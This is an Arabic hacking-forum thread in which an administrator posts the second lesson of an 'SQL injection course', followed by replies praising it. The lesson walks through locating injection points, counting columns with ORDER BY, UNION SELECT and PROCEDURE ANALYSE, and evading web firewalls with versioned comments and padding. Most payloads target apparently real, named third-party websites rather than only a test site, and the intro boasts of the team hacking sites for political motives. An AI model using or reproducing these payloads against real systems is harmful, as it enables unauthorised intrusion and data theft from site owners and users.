1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018

الموضوع في 'دورة حقن قواعد البيانات 2018/2017' بواسطة Ahmed El Melegy, بتاريخ ‏1 أغسطس 2017.

كاتب الموضوع : Ahmed El Melegy المشاهدات : 529 الردود : 31 ‏1 أغسطس 2017
  1. غير متصل

    Ahmed El Melegy InjectorBoy
    طاقم الإدارة

    عضو منذ:
    ‏24 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    214
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    [​IMG]


    السلام عليكم ورحمة الله وبركاتة

    أهلا بجميع الأصدقاء إخوتي بشبكة عراق تيم

    دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018

    المٌقدمة الثانية من أساسيات علم قواعد البيانات المؤهلة للدورة

    المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018

    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات وذلك
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه وفهم
    وإستعاب الدورة بشكل صحيح

    النقاط المشروحة بالمٌقدمة الثانية

    1- معرفة نقطة الحقن
    2- معرفة نٌقطة الحماية
    3- تقنيات إستخراج عدد الأعمدة




    1- معرفة نقطة الحقن


    [​IMG]


    ليس كٌل من إستطاع حقن موقع مصاب نستطيع أن نٌطلق عليه حاقن مٌحترف
    فا حقن قواعد البيانات علم بحد ذاتهٌ إن لم تدرس قواعدة فلن تستطيع أن
    تصمٌد فى هذا المجال وعليه سوف أقوم الأن بشرح كيفية معرفة نقطة الحقن

    ما هي نقطة الحقن : نقطة الحقن هي النٌقطة التي تستطيع عندها القيام بعملية حقن سلسة بدون مشاكل

    عدد نٌقط الحقن : عددها أربعة نٌقط وهٌم ترتيباً

    النوع الأول : SQL Injection Integer Based
    النوع الثاني : SQL Injection Strings Based
    النوع الثالث : SQL Injection Closures
    النوع الرابع : D.I.V Injection


    عندنا الأن أربعة مواقع مصابة تختلف في نٌقط حقنها أي جميعاً يقومٌ
    بتمثيل هذه النٌقط الأربع المذكورة أنفاً



    الموقع الأول

    كود:
    http://testphp.vulnweb.com/listproducts.php?cat=1

    الموقع الثاني


    كود:
    http://waytogonatural.com/product_detail.php?ID=45

    الموقع الثالث


    كود:
    http://www.kiitworld.in/index/about/id/59


    الموقع الرابع


    كود:
    https://www.tirol-taxi.at/index.php?lID=1 



    النوع الأول هو Integer Based أي حقن مٌتغير بصورة مٌبسطة بدون إضافات


    عندنا موقع مٌصاب سوف أقوم بحقنه الأن ومٌحاولة معرفة عدد أعمدتة بإستخدام

    الـ order by 100


    كود:
    testphp.vulnweb.com/listproducts.php?cat=1 order by 100 -- -

    [​IMG]

    كما نٌلاحظ الموقع يتحاوب معنا قائلاً

    Error: Unknown column '100' in 'order clause'

    أي لا يوجد عدد أعمدة بقاعدة البيانات يساوي العدد مائة ومعنى أن الموقع
    تم حقنه ببساطة بدون أية مشاكل مع الـ order by 100 بعد رقم المٌتغير
    هنا يٌسمى هذا الحقن بالـ Integer injection أو الحفن ذو العدد الصحيح
    وهذه هي نٌقطة الحقن الأولى



    النوع الثاني هو String Based الحقن النصي أي حقن مٌتغير بصورة غير مٌبسطة بإضافاتة رمز
    الكومة للمٌتغير لنحقن الموقع الثاني بالأسلوب الأولى ونرى هل سوف يتجاوب معنا
    أم لا


    كود:
    waytogonatural.com/product_detail.php?ID=45 order by 100 -- -

    [​IMG]


    كما نري لم يحدٌث أي شئ بالموقع الأن لنضع رمز الكومة بعد رقم المٌتغير ونٌشاهد النتيجة



    كود:
    waytogonatural.com/product_detail.php?ID=45' order by 100 -- -


    [​IMG]

    كما نٌشاهد تم الحقن بصورة جيدة



    النوع الثالث هو Closure Injection الحقن المٌغلق بقوس أي حقن مٌتغير بصورة غير مٌبسطة
    بإضافاتة قوس معكوف للمٌتغير لنحقن الموقع الثاني الأن بالأسلوب الأول والثاني
    ونرى هل سوف يتجاوب معنا أم لا


    كود:
    www.kiitworld.in/index/about/id/59 order by 100 -- -


    [​IMG]


    لا شئ حدث في الموقع لنٌجرب الحقن الإسترنج أو الحقن النصي


    كود:
    www.kiitworld.in/index/about/id/59' order by 100 -- -


    [​IMG]

    حدث خطأ ولم تتم عملية الحقن لنٌجرِّب الحقن المٌغلق بقوس Closure Injection



    كود:
    www.kiitworld.in/index/about/id/59') order by 100 -- -


    [​IMG]


    تمت عملية الحقن بنجاح و الموقع يتحاوب معنا قائلاً


    Column not found: 1054 Unknown column '100' in 'order clause'

    أي العدد مائة من الأعمده ليس ضمن قاعدة البيانات


    النوع الرابع والأخير هو D.I.V Injection أي حقن المٌتغير بصورة مباشر
    والـ DIV إختصار direct injection to variable أي الحقن المٌباشر للمٌتغير


    لنقوم بحقن الموقع الرابع ونٌتابع النتائج



    كود:
    https://www.tirol-taxi.at/index.php?lID=1 order by 100 -- -


    [​IMG]




    كما نٌلاحظ لاشئ بتاتاً حدث بل مٌجرد خطأ وحتي مع النوعين الأخرين من الحقن حدث نفس الخطأ
    لذا لندرٌس هذا الأمر جيداً بتروي

    أولا لنعود ونري الخطأ الناتج عند وضع رمز الكومة بعد رقم مٌتغير الموقع


    كود:
    https://www.tirol-taxi.at/index.php?lID=1'

    [​IMG]





    نٌلاحظ ظهور خطأ مٌتعدد النتائج لذا لنضع قانون لذلك الخطأ ولنأخٌذ القانون ونحفظهٌ حفظاً جيداً

    عندما نري القيمة "AS" و الرمز كومة ' بعدد كبير في الحطأ الناتج فهذا معناه أن الحقن
    يسمى الحقن قبل الـ "from" ويكون الحقن من النوع الرابع الحقن المٌباشر DIV كالتالي

    نٌلاحظ أننا سوف نقوم بتفادي إستخدام أثناء الحقن أياً من

    order by 100 -- -

    أو

    union select


    ونقوم بوضع الأرقام الخاصة بالاعمدة بصورة مباشره واحداً تلو الأخر كاتخمين بالتجروبة
    حتى تظهر الأعمدة المصابة



    كود:
    https://www.tirol-taxi.at/index.php?lID=1,2


    [​IMG]




    الأعمدة المٌصابة ظهرت بالموقع وهٌم من جهت العدد إثنين فقط الأن لنعرف إصدار قاعدة البيانات
    بإستخدام version() مكان العمود المٌصاب



    كود:
    https://www.tirol-taxi.at/index.php?lID=1,version()


    [​IMG]



    إصدار قاعدة البيانات هو الإصدار 5.1.73
    <<<<

    إذا فى نهاية الأمر هذا مايٌسمى بنٌقطة الحقن

    نقوم بالحقن بدون أي إضافات

    id=1 order by 100 -- -

    إن لم يحدٌث شئ نٌضيف رمز الكومة إلي المتغير

    id=1' order by 100 -- -

    إن لم يحدٌث شئ نٌضيف قوس معكوف إلي المتغير

    id=1') order by 100 -- -

    ونٌلاحظ جيداً أنه قد تكون نقطة الحقن بإستخدام قوس فقط بدون إستخدام الكومة

    id=1) order by 100 -- -

    مثل هذا الموقع




    كود:
    www.koxyradio.com/shows/show.php?id=7) order by 100 -- -



    [​IMG]


    فإن لم يتم التوصٌّل إلي نٌقطة الحقن بالمناطق الثلاث الأولى
    نلجئ لتجربة النوع الرابع من الحقن الـ DIV



    2- معرفة نٌقطة الحماية


    يجب معرفة نٌقطة الحماية كي نعرف كيف نتعامل معها


    عند حقن موقع ما كالتالي



    كود:
    www.wazen.ly/single_news.php?id=35 union+select 1,2,3,4,5


    [​IMG]


    نجد الحماية هٌنا تٌعطي سبب المنع بالناتج Not Acceptable وهذا معناه أن الحماية تمنع الـ select
    في الإستعلاما الكٌلي من العمل ولتخطي ذلك نقوم بفلترتها بالصورة التاليه بوضعها داخل القيمة التالية

    /*!50000*/

    على النحو التالي

    /*!50000select*/

    وهذا الإستعلام /*!50000*/ هو الفلترة لأي أمر ممنوع بسبب الحماية



    كود:
    www.wazen.ly/single_news.php?id=35 union+/*!50000select*/ 1,2,3,4,5


    [​IMG]


    الموقع يعمل بصورة جيدة الأن , لكن في حالة وجود الحماية بإسم مٌغاير تحت إسم Forbidden
    بدل NotAcceptable فهذا معناه أن الحماية تمنع الـ union فنقوم بفلترتها ويتم التخطي بالطريقة السابقة

    /*!50000union*/


    توجد حالة ثالثة هٌنا وهي ظهور سبب المنع NotAcceptable فنقوم طبيعياً بفلترة select فيظهر بعدها Forbidden
    فنقوم بفلترة union لكن هٌنا لا تذهب الحماية ويظل الموقع لا يعمل فهذا معناه أن الحماية مٌزدوجة
    على كٌلاً من الـ union والـ select ويتم تخطي ذلك عن طريق ما يسمى بتقنية الفيض الغامر
    Buffer Overflow كالتالي


    بتقنية الفيض الغامر Buffer Overflow



    كود:
    /*!50000UnIoN*/%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A/*!50000SeLeCt*/



    مثال على موقع به الحماية مٌزدوجة على كٌلاً من الـ union والـ select




    كود:
    www.tacc.co.il/story.php?id=.9- .1/*!50000UnIoN*/%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A%23aaaaaaaaaaaaaaaaaaaaaa%0A/*!50000SeLeCt*/!1,2,3,4,5,6,7,8-- -



    [​IMG]




    تم التخطي بإستخدام تقنية الفيض الغامر كا أٌسلوب من أساليب الفلترة والتخطي


    3- تقنيات إستخراج عدد الأعمدة

    لكي نقوم بحقن موقع ما مٌصاب سوف يتوجب علينا معرفة عدد أعمدة الموقع وتوجد
    طريقة معروفة وهي بإستخدام الأمر order by 100-- - بعد رقم المٌتغير فتظهر النتيجة كما شاهدنا سابقا مٌخبره إيانا
    أن عدد الأعمدة غير صحيح فنقوم بالتقليل حتى نعرف العدد الصحيح الكٌلي للأعمدة ولكن هٌنا لن أعتمد على ذلك وسوف أشرح عدة تقنيات أٌخري فالنٌتابعها


    التقنية الأولي : تقنية الفيض الغامر



    كود:
     Order By 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
    ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57
    ,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84
    ,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99--+-


    بوضع الكود السابق التابع لتقنية الفيض الغامر بعد رقم المٌتغير سوف تظهر نتيجة مؤكدة تقول أن العدد x
    غير موجود ومعناه أن عدد الأعمدة الصحيح هو العدد الذي قبل العدد x الظاهر في الخطأ فى الرتيب الرقمى



    كود:
    testphp.vulnweb.com/listproducts.php?cat=1   Order By 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99--+-


    [​IMG]




    Error: Unknown column '12' in 'order clause'


    الخطأ يقول أن العدد 12 من الأعمدة غير موجود وهذا معناه أن العدد 11 من الأعمدة موجود
    وهو العدد الصحيح للأعمدة كما نرى بالإستغلال الكامل




    كود:
    http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11-- -



    [​IMG]





    التقنية الثانية : إستخدام PROCEDURE ANALYSE


    الـ PROCEDURE ANALYSE هي تقنية التلميح أي أن قاعدة البيانات تٌلمح لنا بصورة ما عن
    العدد الصحيح للأعمدة وبوضع أحد إستعلامات الـ PROCEDURE ANALYSE
    بعد رقم المٌتغير سوف نحصٌل على نفس النتيجة السابقة الدالة على عدد الأعمدة الصحيحة
    لكن بصورة مٌختلفة من ناحية الكيفية



    الإستعلام الأول



    كود:
     PROCEDURE ANALYSE()-- -

    هذا الإستعلام سوف نعرف عن طريقة عدد الأعمدة الصحيح للموقع وذلك عن طريق عد الشئ أو الأشياء
    الظاهر بكثرة بالموقع إما أسطٌر كتابية مٌكررة أو عدد من الصور مٌكررة كما الحال هٌنا



    كود:
    testphp.vulnweb.com/listproducts.php?cat=1  PROCEDURE ANALYSE()-- -



    [​IMG]



    بعدد الصورة الظاهر بالموقع وجدتها إحدى عشر صورة وهذا يعنى أن عدد الأعمدة هو إحد عشر عموداً صحيحاً


    الإستعلام الثاني



    كود:
     LIMIT 0,1 PROCEDURE ANALYSE()-- -

    هذا الإستعلام يعمل عن طريق رفع القيمة الرقمية للعدد صفر بالإستعلام LIMIT حتى تظهر صفحة بيضاء
    تدل على عدد الأعمدة الصحيحه للموقع


    LIMIT 0,1


    هٌنا بالموقع المٌختبر عند العدد 10 الموقع يعمل جيداً




    كود:
    http://testphp.vulnweb.com/listproducts.php?cat=1  LIMIT 10,1 PROCEDURE ANALYSE()-- -




    [​IMG]





    وعند العدد إحد عشر لا يعمل الموقع حيداً




    كود:
    http://testphp.vulnweb.com/listproducts.php?cat=1  LIMIT 11,1 PROCEDURE ANALYSE()-- -




    [​IMG]





    وهذا معناه أن الرقم الإخير الذي لا يعمل عندهٌ الموقع بصورة جيده هو عدد الأعمدة الصحيح للموقع


    >>>


    إلي هٌنا إنتهت المٌقدمة الثانية والأخير ومن الدرس القادم تبدء الدورة المٌتقدمة فى مجال حقن قواعد البيانات

    أتمنى أن تكونو إستمتعتٌم بالشرح

    إلى اللقاء فى الشرح القادم
     


    Y-WaLiS ،Virus day ،~.O M A R.~ و 16آخرون معجبون بهذا.
    جاري تحميل الصفحة...
  2. غير متصل

    saltan113
    rank
    New Developer

    عضو منذ:
    ‏2 أغسطس 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    بارك الله فيك
     


    أعجب بهذه المشاركة Ahmed El Melegy
  3. غير متصل

    Mohmaed .:: super ::.
    V • I • P

    عضو منذ:
    ‏12 ابريل 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    948
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    ما شاء الله عليك يا وحش
    استمر نحو القمه
    لا تحرمنا
     


    أعجب بهذه المشاركة Ahmed El Melegy
  4. غير متصل

    Ahmed El Melegy InjectorBoy
    طاقم الإدارة

    عضو منذ:
    ‏24 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    214
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    ,t
    وفيك بارك أرجو الإستفادة الكاملة
     


  5. غير متصل

    Ahmed El Melegy InjectorBoy
    طاقم الإدارة

    عضو منذ:
    ‏24 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    214
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    جزاك الله خيراً عزيزي

    دائماً أسعد بمروكم المٌبارك إخي
     


  6. غير متصل

    SCENARIO Developer

    عضو منذ:
    ‏2 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    247
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    عاشت يمناك
    i!q (1.,_)2)
     


    أعجب بهذه المشاركة Ahmed El Melegy
  7. غير متصل

    E w i l O s
    ExpErt DeveloPer

    عضو منذ:
    ‏25 فبراير 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    150
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    طرح رائع، قيم و مفيد...
    انتقاء موفق....أخي الكريم
    بوركت جهودك، و كللت أعمالك
    تحياتي
     


    أعجب بهذه المشاركة Ahmed El Melegy
  8. غير متصل

    Saif Saad Sabri Active
    Active DeveloPer

    عضو منذ:
    ‏6 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    39
    نقاط الجائزة:
    الإقامة:

    عمل راائع جدا
     


    أعجب بهذه المشاركة Ahmed El Melegy
  9. غير متصل

    ★ Ể Ĩ Ň Ŝ Ŧ Ĩ Ň ★
    rank
    New Developer

    عضو منذ:
    ‏29 يوليو 2017
    عدد المشاركات:
    الإعجابات المتلقاة:
    18
    نقاط الجائزة:
    الإقامة:

    يعطيك الف عافيه

    الله لايحرمنا منك
     


    أعجب بهذه المشاركة Ahmed El Melegy
  10. غير متصل

    Mr.BOY
    rankrank
    Developer

    عضو منذ:
    ‏19 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:
    الإقامة:

    يعطيك العافية صديقي مبدع ما شاء الله عليك يا بطل
     


    أعجب بهذه المشاركة Ahmed El Melegy

مشاركة هذه الصفحة

جاري تحميل الصفحة...